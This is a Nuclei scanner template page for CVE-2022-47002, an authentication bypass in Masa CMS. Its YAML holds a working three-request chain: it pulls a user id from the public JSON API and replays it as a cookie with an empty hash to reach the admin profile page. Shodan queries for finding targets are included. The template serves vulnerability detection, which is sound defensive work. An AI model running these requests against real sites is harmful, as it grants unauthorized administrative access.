Skip to content
Nuclei Templates

Masa CMS - Authentication Bypass

ID: CVE-2022-47002

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2022,auth-bypass,cms,masa,masacms

Description

Section titled “Description”

Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2022-47002


info:
  name: Masa CMS - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS.
  reference:
    - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html
    - https://github.com/MasaCMS/MasaCMS/releases/tag/7.3.10
    - https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-47002
    - https://www.hoyahaxa.com/2023/01/preliminary-security-advisory.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-47002
    cwe-id: CWE-863
    epss-score: 0.0395
    epss-percentile: 0.91996
    cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: masacms
    product: masacms
    shodan-query:
      - 'Generator: Masa CMS'
      - "generator: masa cms"
  tags: cve,cve2022,auth-bypass,cms,masa,masacms


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
        Host: {{Hostname}}
        Cookie: userid={{uuid}}; userhash=


    redirects: true
    max-redirects: 2


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3,"\"userid\"")'
        condition: and


      - type: word
        part: body_3
        words:
          - "Edit Profile"


    extractors:
      - type: regex
        name: siteid
        group: 1
        regex:
          - 'siteid:"(.*?)"'
        internal: true
        part: body


      - type: regex
        name: uuid
        group: 1
        regex:
          - '"lastupdatebyid":"([A-F0-9-]+)"'
        internal: true
        part: body
# digest: 4a0a0047304502210085120853218605a0b3e52ffa806ad3361f62b4f98c0bd1a35c21689e79bcf14502204d7f6fcb07e2287e26946f0c74b8590278ceb7db7f20f395018a2a5bea0b3830:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-47002.yaml"

View on Github